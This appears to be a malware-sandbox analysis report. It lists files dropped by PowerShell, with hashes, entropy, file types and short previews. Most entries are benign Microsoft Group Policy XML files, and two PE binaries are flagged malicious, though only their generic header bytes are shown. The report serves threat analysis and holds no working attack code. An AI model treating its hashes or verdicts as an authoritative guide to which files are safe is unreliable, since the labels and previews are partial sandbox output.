                                                                                                                                                                                                        SHA-512:D3CF29A37D3B5E1FAA7B8153FB2C21DB9A65868530C51D8E589CDD2E010674CD93610DDC10309D15DF07B6E9E6D6D892C8DB0E16E67638BF72BEAD9FC83E4AB9
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:<?xml version="1.0"?>..<doc>.. <assembly>.. <name>NAudio</name>.. </assembly>.. <members>.. <member name="T:NAudio.Codecs.ALawDecoder">.. <summary>.. a-law decoder.. based on code from:.. http://hazelware.luggle.com/tutorials/mulawcompression.html.. </summary>.. </member>.. <member name="F:NAudio.Codecs.ALawDecoder.ALawDecompressTable">.. <summary>.. only 512 bytes required, so just use a lookup.. </summary>.. </member>.. <member name="M:NAudio.Codecs.ALawDecoder.ALawToLinearSample(System.Byte)">.. <summary>.. Converts an a-law encoded byte to a 16 bit linear sample.. </summary>.. <param name="aLaw">a-law encoded byte</param>.. <returns>Linear sample</returns>.. </member>.. <member name="T:NAudio.Codecs.ALawEncoder">.. <summary>.. A-law encoder.. </
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):424552
                                                                                                                                                                                                        Entropy (8bit):6.000236226718345
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3072:bebeJQsqiaJnFdHfQoB9bls1YxRz5QZ1y+ymaQfA30KQBhYJXv4M4Mz07ROZH1pH:jh+nf4+tG/vyohq4M4M4gl7T
                                                                                                                                                                                                        MD5:A341D9BFAAE6A784CB9E2EA49C183FB4
                                                                                                                                                                                                        SHA1:D061C12DFFA6A725F649DAE49C99F157E93BB175
                                                                                                                                                                                                        SHA-256:52416BB8275988AA5145BE6359B6C6A92E3C20817544682C2C1978B50FF2052C
                                                                                                                                                                                                        SHA-512:9DFF4BA2ABF889C9F9E71DA1F91ABDDE1742A542B53E8C289E011113E1BCB86D4B1AAF5E7AADF97AA5ED36AB50227295E27CE700D30524F7198FD8F3928C36A2
                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......=.. yx.syx.syx.sp.#sux.s...r{x.sl..rex.sl..rsx.sl..rzx.sl..r.x.syx.szx.syx.s.x.sO..r.x.sO.Osxx.syx'sxx.sO..rxx.sRichyx.s........PE..d....\.e.........."....%............4..........@...................................../....`..........................................................`...........F...R..h(...p..8"..PT..T............................S..@............................................text............................... ..`.rdata..............................@..@.data....a.......\..................@....pdata...F.......H..................@..@.rsrc........`.......&..............@..@.reloc..8"...p...$..................@..B................................................................................................................................................................................................................................................
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):1106
                                                                                                                                                                                                        Entropy (8bit):5.038231865445437
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:24:2dV8F7H3p2/+XBPpZp2/+XBPqp2/+XBw1irkV:cVg7C+XBR4+XBn+XBvrE
                                                                                                                                                                                                        MD5:75E66AB540561A0C7D4160271F518243
                                                                                                                                                                                                        SHA1:AD6501E407D216744B6C3DE76D7664D9581EBAD2
                                                                                                                                                                                                        SHA-256:091AFFF3BB63024B5A7B14EA30306B6753858FD1A33FC8C98E3B5E65FE92FBE7
                                                                                                                                                                                                        SHA-512:FCB55C0FDBB984B06AFF2FAFCAEA2596C175AA5A07D2F1A401305D3441338AA266A53D2DE7A7577684884A2E12CE3EE430B2E1D0210684A7EEFAF9EAA0DE115F
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.... <appSettings>.. <add key="DownloadLocation" value=""/>.. </appSettings>.... <runtime>.... <assemblyBinding xmlns="urn:schemas-microsoft-com:asm.v1">.... <dependentAssembly>.... <assemblyIdentity name="System.Runtime" publicKeyToken="b03f5f7f11d50a3a" culture="neutral"/>.... <bindingRedirect oldVersion="0.0.0.0-4.0.0.0" newVersion="4.0.0.0"/>.... </dependentAssembly>.... <dependentAssembly>.... <assemblyIdentity name="System.Threading.Tasks" publicKeyToken="b03f5f7f11d50a3a" culture="neutral"/>.... <bindingRedirect oldVersion="0.0.0.0-4.0.0.0" newVersion="4.0.0.0"/>.... </dependentAssembly>.... <dependentAssembly>.... <assemblyIdentity name="System.Net.Http" publicKeyToken="b03f5f7f11d50a3a" culture="neutral"/>.... <bindingRedirect oldVersion="0.0.0.0-4.0.0.0" newVersion="4.0.0.0"/>.... </dependentAssembly>.... </assemblyBinding>.... </runtime>
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):4917656
                                                                                                                                                                                                        Entropy (8bit):6.3987875878837785
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:49152:+CZnRO4XyM53Rkq4ypQqdoRpmruVNYvkaRwvdiD0N+YEzI4og/RfzHLeHTRhFRNZ:tG2QCwmHjnog/pzHAo/Ay
                                                                                                                                                                                                        MD5:B37CC24FCFDCCA9DEAD17A498E66DB9C
                                                                                                                                                                                                        SHA1:C959AB27CE476DCB0C7312C30C613FE3307BB877
                                                                                                                                                                                                        SHA-256:9F5B1AD41183BA50896EB09BE917B1382980224E212A97080D33C0BF3DEE40DD
                                                                                                                                                                                                        SHA-512:E62E1B985939688AA2EB920F5CFA50377934A8256D7AAA8A1DEF705DE1D47E5CD15515D043622553BBE512469F5C2ED05A7BDEDD4F5D17E99109274F9BFFE95C
                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........|3..]...]...]..e\...]...\.5.]..e...]..wX...]..wY...]..e^...]..eX.y.]..eY...]..e]...]..eU./.]..e....]..e_...].Rich..].................PE..d.....Ne.........." ......8..........<).......................................K.......K...`A........................................`%G.x....(G.P.....J.@.....H.......J..)....J.....p.D.p....................S<.(...pR<.@............S<.(............................text.....8.......8................. ..`.rdata...F....8..P....8.............@..@.data...`....@G......@G.............@....pdata........H......@H.............@..@.rsrc...@.....J......@J.............@..@.reloc........J......PJ.............@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):6175880
                                                                                                                                                                                                        Entropy (8bit):5.4706772583563845
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:49152:sLFPZAKkA/koZdvvVqdkTZdvvVqwkF/yWzmJUTvU8ZaTG2os1y3JkkaXSqDJMuXR:WLwW
                                                                                                                                                                                                        MD5:731A70D555B49A74607EFA43D407948F
                                                                                                                                                                                                        SHA1:01B9D0CF34EAB6D171A819C0A6A694B8B499702E
                                                                                                                                                                                                        SHA-256:94B15729530FCF90D11156D38FFD0152ACE21182EE44E63C51DC5E2AF25345D2
                                                                                                                                                                                                        SHA-512:4D8EB837BA3FF475F42D72DF0375CA4CC0CA18B4E3702FF39E910D67686AFB81234C457C61BDD36C8927FF73695BB19017423CDA2787242273E0BAA398DDABB0
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:........~....p.....p.....p.3...p.6...p.p...p./...p.3...p.7...pd....p8....pu....pM....p.....p:]$..pu_$..p.0%..p.2%..pQ.%..pR.&..p..+..psi+..pV.+..p..+..p.a0..p.A1..p;.3..p..3..p.?4..p..5..p..5..p..5..p..:..p4W:..p~w:..pD.:..py.:..p0.;..p+.;..pe.=..pe.=..p..>..p..>..p..B..pN.C..pi~E..p..E..p..H..q.PI..q3.L..q.OL..q..L..q,,M..qP?M..q%SN..q..R..qo.U..q.wV..q.xZ..q..Z..q<0[..q..\..q.n\..q.v\..q~w\..q.~\..q.~\..q..\..q..\..q..\..q.\..qy.\..q..\..q.\..qm.\..qs.\..q.\..qp.\..ql.\..q.\. ql.\.!q..\."q..\.#q..].$q=.].%q..].&q..].'q..].(q..].)q..].*qa"].+q.\].,q.n].-q.]..q.]./q..].0qB.].1q..].2q..].3q.].4q..].5q`.].6qL.].7q.].8qG.].9q..].:q..].;q+.].<q..].=q.].>q\.].?qo.].@q..].Aq..].Bq..].Cq..].Dq>.].Eq..].Fq\.].Gq..].HqB.^.Iq..^.Jq).^.Kq8.^.Lq>.^.Mq..^.Nq..^....<^..p&.W._,...T...Ve .8..P.H...=......D.g.{.:..r.....R.j.`.._....a.J...[U....[.o.A.......Uvx......lM........k...2|.+.....c1BJu[G"..A.p.Z.......I..^x....Q4....2f.6..[..#x...T.}r....oP...(i......pr..mU_.O5.2..4{}.MQG..
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with very long lines (403), with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):5601
                                                                                                                                                                                                        Entropy (8bit):4.777090038504722
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:48:cgeD5x8gm0fUsPXKn5o3OqALPLFS31U87GUkNAsGNuiYzXmoOX1mTXoWlIGe0FsC:LeD5pmKeC3G8SsuiYR1Pl7e0V4zZpBsV
                                                                                                                                                                                                        MD5:46876B1E6C8BA1FBF3ABC838CCF809B0
                                                                                                                                                                                                        SHA1:45CE70EDD0CA87A5920D43385066087DF134E30F
                                                                                                                                                                                                        SHA-256:F49428CABB6F6671D95EF214133100C268D2AB04DBF0F095DD08B0105ED9D8A7
                                                                                                                                                                                                        SHA-512:702C319B2D181753BE99D99C3DFF9F6C578934067C89A614E9E4B0A5DA6A0FB3545A3BA4986E12E9DA5DE8C6AF56780982D181A8D949A6E573AF725E2505DECA
                                                                                                                                                                                                        Malicious:false
Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>ActiveX Installer Service</displayName>.. <description>Installs ActiveX controls from approved installation sites</description>.. <resources>.. <stringTable>.. <string id="AxInstSv">ActiveX Installer Service</string>.. <string id="AxISURLZonePolicies">Establish ActiveX installation policy for sites in Trusted zones</string> .. <string id="AxISURLZonePolicies_explain">This policy setting controls the installation of ActiveX controls for sites in Trusted zone. ....If you enable this policy setting, ActiveX controls are installed according to the settings defined by this policy setting. .. ..If you disable or do not configure t
Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:XML 1.0 document, ASCII text, with very long lines (496), with CRLF line terminators
Category:dropped
Size (bytes):10736
Entropy (8bit):4.664813059485856
Encrypted:false
SSDEEP:192:Eyvs59wT2mCtKNSMRdMi4LBDZDHZEzT+ygx5LDkFdzj9nWyihWhqeGzpbeEKJ28m:ZvyiCDdyTO54zj9na8hqe6pbeEK5jq
MD5:DFE20A0CA8674D6EAEA280C139E2688A
SHA1:97027B92D40F5029FF296A9EA3105B775B50C209
SHA-256:C97CD236F8BE2B235685D3D16632482839208604DB3F550F9524EAFDA33B9CA9
SHA-512:120C45BD17045B6F3D4A9295E1888D81FFA99ED0F1D146AA2EEC387C1187EEF8C718179771BC0CDBE01A37A487D933F55C92F6F37954F392F007CBFAA2AEC877
Malicious:false
Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="Arp">Add or Remove Programs</string>.. <string id="DefaultCategory">Specify default category for Add New Programs</string>.. <string id="DefaultCategory_Help">Specifies the category of programs that appears when users open the "Add New Programs" page.....If you enable this setting, only the programs in the category you specify are displayed when the "Add New Programs" page opens. Users can use the Category box on the "Add New Programs" page to display programs in other categories.....To use this setting,
Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:XML 1.0 document, ASCII text, with very long lines (565), with CRLF line terminators
Category:dropped
Size (bytes):10119
Entropy (8bit):4.722381803392372
Encrypted:false
SSDEEP:192:EsMVhCuGKXl6hIAtZUqxw66Utw0Uvk3EUN2X/TDcvEn:J/uX6GAjj6mcvk3EUN2XXcvQ
MD5:93C28840D18ED15AF63308926F5AAC66
SHA1:5ED7A8056F1E8A68FEA17C6EF81B695DF8A3EA70
SHA-256:0AC43A8DF0E8795968C0F9B6ECC6FBF620B761C128545AD689EEC5DFF21F5F1D
SHA-512:653B9905DC0BBDE62F06EFA1C613F4E4A0823331D31D396DB0226FDB41A9AD4D148C1B5DABFA0CA64A74156F5AD446428F3344FFE75828A7C8225D3F0D214758
Malicious:false
Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="AppCompat">Application Compatibility</string>.. <string id="AppCompat_Prevent16BitMach_Help">Specifies whether to prevent the MS-DOS subsystem (ntvdm.exe) from running on this computer. This setting affects the launching of 16-bit applications in the operating system.....You can use this setting to turn off the MS-DOS subsystem, which will reduce resource usage and prevent users from running 16-bit applications. To run any 16-bit application or any application with 16-bit components, ntvdm.exe must be allowed
Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:XML 1.0 document, ASCII text, with very long lines (394), with CRLF line terminators
Category:dropped
Size (bytes):4462
Entropy (8bit):4.744620806615911
Encrypted:false
SSDEEP:96:jJpm5IJUVaBfgHt6kNEmB+kClbNpbj03V:Xc3AIHF20F
MD5:BF19DB2E91EDEFE517515BA23B30103E
SHA1:324D98B315D7F8E096D8D61505610706D0C73856
SHA-256:42778994D23CDB74C446E70C30942991E89DF6AACC1225AEBB05464D69DA6DEC
SHA-512:9C193CD9597F90913643CDD2079E36930E60B6AB539D96BA0D5DA7EA2B5DDE0B78D7451D0A4AC37CBBB8A90C548285FBF640099EDA949665E186586D893ADB14
Malicious:false
Preview:<?xml version="1.0" encoding="utf-8"?>.. Copyright (C) Microsoft. All rights reserved. -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>App runtime</displayName>.. <description>App runtime policies</description>.. <resources>.. <stringTable>.. <string id="AppxRuntime">App runtime</string>.. <string id="AppxRuntime_Help">Contains settings to manage the behavior of Windows Store apps.</string>.. <string id="AppxRuntimeBlockFileElevation">Block launching desktop apps associated with a file.</string>.. <string id="AppxRuntimeBlockFileElevationExplanation">This policy setting lets you control whether Windows Store apps can open files using the default desktop app for a file type. Because desktop apps run at a higher integrity level than Windows Store apps
Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:XML 1.0 document, ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):3093
Entropy (8bit):4.7903363478779735
Encrypted:false
SSDEEP:48:c0Jx8gm9JcfSB2W27u0jX9X/f4kvqGbRG4QXzgtWFV:jJpm9Jc62Dv5bRjWFV
MD5:B182F0B429A84D7E97C3D50EADF154A5
SHA1:87DDA04EDCFE5E6C22F0224D9EE8375E0920B7F6
SHA-256:5CD8B222AECBDEAC3DF2DE6B774AF7E02988981136F6E5E9CD3D12735C6A6416
SHA-512:C42670FA053734C1B909FBB1AE189D4ACF72B290679C1564D78276022BDF0AFD279558C608F00953325E5AEE47EB93DF35C5AFDBB29F698E5C8F808610DB5055
Malicious:false
Preview:<?xml version="1.0" encoding="utf-8"?>.. Copyright (C) Microsoft. All rights reserved. -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. displayName and description are not used. Not supported by current Group Policy tools. -->.. <displayName>Appx Package Manager</displayName> .. <description>Appx Package Manager</description>.. <resources>.. <stringTable>.. <string id="AppxDeployment">App Package Deployment</string>.. <string id="AppxDeploymentAllowAllTrustedApps">Allow all trusted apps to install</string>.. <string id="AppxDeploymentAllowAllTrustedAppsExplanation">This policy setting allows you to manage the installation of trusted line-of-business (LOB) Windows Store apps.....If you enable this policy setting, you can install any LOB Windows Store app (which m
Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:XML 1.0 document, ASCII text, with very long lines (564), with CRLF line terminators
Category:dropped
Size (bytes):9845
Entropy (8bit):4.7103779388766025
Encrypted:false
SSDEEP:96:LeD5pmiPXXvXd0GkXgueX0dX0LhTW9jS+9FMDPaSPL9DVH60XZgn9ZE60Y2IHm0s:EZHvmQ/WXtyPHPLuV3HmEPdHK
MD5:156ADEBCA5CD43E0D849F921B26594C3
SHA1:0DCDA3A3C5CDB824D7FAE9FD2D52638DE6BAC841
SHA-256:6974AEBDCB65AB63DECD224D3C060F0AFCA11E00C781657EAD44F64073094BF8
SHA-512:32DC4890719AAEBC7CB5A088EF7C4FD7A86207C36E76C0FA60584E3DF0687C2DF297CBF82750885BCD42542700BD0D14011D57D9CED9FC32E582F70061C68013
Malicious:false
Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="AM_AM">Attachment Manager</string>.. <string id="AM_CallIOfficeAntiVirus">Notify antivirus programs when opening attachments</string>.. <string id="AM_EstimateFileHandlerRisk">Trust logic for file attachments</string>.. <string id="AM_ExplainCallIOfficeAntiVirus">This policy setting allows you to manage the behavior for notifying registered antivirus programs. If multiple programs are registered, they will all be notified. If the registered antivirus program already performs on-access checks or scans
Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:XML 1.0 document, ASCII text, with very long lines (369), with CRLF line terminators
Category:dropped
Size (bytes):1846
Entropy (8bit):4.78689414618934
Encrypted:false
SSDEEP:48:cgeD5x8gmsYLytG4rpdfUMo5mvS3bHpWdPV:LeD5pmvWvp+5wwWNV
MD5:71075FCE08402095AEAFBE57962A1F5B
SHA1:F76FAE255AA5454217FE973C4A8035EC9005B923
SHA-256:6928FAAD9624BBF4C74F6C138496A4C6AE8D04919C3DE9591568300C1DD39E59
SHA-512:9DF7480E584B16D1B504E2503B3C4C8422EFC2FA37D9A4ACEB8A7AEA0561C0D73E8E73CB21FEA20C6EC3BBBCB715C155EFDA7B8E38B7B448BCDA5DB10D773DE4
Malicious:false
Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>Audit Process Creation</displayName>.. <description>Configuration settings for auditing process creation.</description>.. <resources>.. <stringTable>.. <string id="AuditSettings">Audit Process Creation</string>.. <string id="IncludeCmdLine">Include command line in process creation events</string>.. <string id="IncludeCmdLine_explain">This policy setting determines what information is logged in security audit events when a new process has been created.....This setting only applies when the Audit Process Creation policy is enabled. If you enable this policy setting the command line information for every process will be logged in plain tex
Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:XML 1.0 document, ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):4884
Entropy (8bit):4.732776627339853
Encrypted:false
SSDEEP:96:LeD5pmCRsKp7RqiPKhB3a1jejcM64iVDJaqV:ELRRp74a1AbodJ7
MD5:935C602DAD3F4335BD16C269E66DBFAA
SHA1:3DF4DC6D55AF20F0593D807FB4FDEFB23CC3355A
SHA-256:8773998440C8D534FA69833174D05D09088F07E6E5C0E41D7C04A229C7903879
SHA-512:05ABFFC0CE836F7438BC711A9D2B5CEB8F3F1C48BE2AC9C1A91D286AED6FC4C8D740AE802DCD2CC65D066972DC8DAA84AD8A10FA775D66CB5F3DE34688D975EC
Malicious:false
Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="AutoPlay">AutoPlay Policies</string>.. <string id="AutoPlay_Help">Configure various AutoPlay behaviors.</string>.. <string id="NoAutorun">Set the default behavior for AutoRun</string>.. <string id="NoAutorun_Help">This policy setting sets the default behavior for Autorun commands..... Autorun commands are generally stored in autorun.inf files. They often launch the installation program or other routines..... Prior to Windows Vista, when media containing an autorun command is inserte
Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:XML 1.0 document, ASCII text, with very long lines (381), with CRLF line terminators
Category:dropped
Size (bytes):4309
Entropy (8bit):4.706598922443907
Encrypted:false
SSDEEP:96:oD5pmJFp5A8M9DIn0C3ppMdiD+BukevPCRTqCV:+Mp5lM9M3ppUiC2vPClP
MD5:C32F834C78DC4DB3C12084AB5115E4A5
SHA1:BE211306E8BA801EDD43E68E28F98947354A35BC
SHA-256:4222D7C39B72F570C01F76EE084278BD32619D039F197A1AAE0B508C4E2CAF32
SHA-512:2551575C490A8B4C36FD0E44B4E7C27693DF94C74715BC0F242BE2F947AE2AF097D574AC1823F3ACC71E8D69C17D6257192AAB1255B25C3122F4196C10B9F674
Malicious:false
Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2008 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>Biometrics Configuration Settings</displayName>.. <description>Biometrics Configuration Settings</description>.. <resources>.. <stringTable>.. <string id="BiometricsConfiguration">Biometrics</string>.. <string id="Biometrics_EnableBio">Allow the use of biometrics</string>.. <string id="Biometrics_EnableBio_Help">This policy setting allows or prevents the Windows Biometric Service to run on this computer... ..If you enable or do not configure this policy setting, the Windows Biometric Service is available, and users can run applications that use biometrics on Windows. If you want to enable the ability to log on with biometrics, yo
Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:XML 1.0 document, ASCII text, with very long lines (534), with CRLF line terminators
Category:dropped
Size (bytes):32159
Entropy (8bit):4.887654356231583
Encrypted:false
SSDEEP:768:Uw9+2pWqx80t3lMsQAZ5nV7smu7CQ62TDw4p2L:H+2Lx8Q3lLB+wx
MD5:F6E746CD330A73B928C14770D9645BD0
SHA1:7EDED72EB36035A93AF3943B6F5F330082307968
                                                                                                                                                                                                        SHA-256:80D730B14BBB66B29360C108C8A57E09AA33E57DC1C9EAFFCAD5D66B3EF98C31
                                                                                                                                                                                                        SHA-512:6295E9062941DAEDCF4BF3E5BEBA03010AFDE880F43E95052DBCE3FDB485C92C73B0CB57E9374F691C79FA43044CFCBBDB92CDE189E1C3AFF90024B19B525F1E
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.2" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. Supported Platforms -->.. <string id="SUPPORTED_WindowsXPSP2WindowsNETSP1orBITS20">Windows XP SP2 or Windows Server 2003 SP1, or computers with BITS 2.0 installed.</string>.. <string id="SUPPORTED_WindowsXPWindowsNETorBITS15">Windows XP or Windows Server 2003, or computers with BITS 1.5 installed.</string>.. <string id="SUPPORTED_Windows7OrBITS35">Windows 7 or computers with BITS 3.5 installed.</string>.. <string id="SUPPORTED_Windows8OrBITS5">Windows 8 or Windows Server 2012 or Windows RT or computers
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):1949
                                                                                                                                                                                                        Entropy (8bit):4.91759301234844
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:24:2dgeD5eo8gWt4+3Fbef61yMPs9IsKiz+d9Wz+fWz+MJe4UNr2ce4u5qHLuB1XR0r:cgeD5x8gm8fKfiI9W+WwUzqG1XGPV
                                                                                                                                                                                                        MD5:CB1E5DCF00DD4AA26834F7F02EA4AA0E
                                                                                                                                                                                                        SHA1:EAEBB6A75FE6AEEC3AFE914DF9DAD9BCB08702C1
                                                                                                                                                                                                        SHA-256:7651F59A99180721F39B02391BB51D382B39DBCD15E3E2245B10778B7A8A5D95
                                                                                                                                                                                                        SHA-512:BC84BD30E99735495803360F061088334736CAF9D7AE1C5FAD9C484D949991F09C59D6FB818DE35F6328E94FEDD63C2C6D80D63ACDF616BF936762CBF656AE3A
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="WindowsCEIPCat">Windows Customer Experience Improvement Program</string>.. <string id="CorporateSQM">Allow Corporate redirection of Customer Experience Improvement uploads</string>.. <string id="CorporateSQMExp">If you enable this setting all Customer Experience Improvement Program uploads are redirected to Microsoft Operations Manager server.....If you disable this setting uploads are not redirected to a Microsoft Operations Manager server.....If you do not configure this setting uploads are not redirect
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):1670
                                                                                                                                                                                                        Entropy (8bit):4.895822032017801
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:24:2dgeD5eo8gWt4+3Fbef61yr7g9f8rbcFCv/9g4+4R4ldQ8o9+YPb+aDDWFV:cgeD5x8gm8fKN2fcFC2u47QxQ3aDDWFV
                                                                                                                                                                                                        MD5:33757EAC0441251ACE18BD74FF8E2BD0
                                                                                                                                                                                                        SHA1:B9DBC0B240CF803AFACB5D8D9AD26E39B757B04B
                                                                                                                                                                                                        SHA-256:44FA3B1E818EF70305AD41012D78CF140851EC0949D4F2457F60C295E31C8EDC
                                                                                                                                                                                                        SHA-512:5FB7BD40C37EAB269C7E9CF72EFB29D6A6A2EF76DB29DADD628866143A15FCEE46C865BE54C66D7C6ADE13766FF1A3028912BDF8BE05F1A6CD69D254431180C2
                                                                                                                                                                                                        Malicious:false
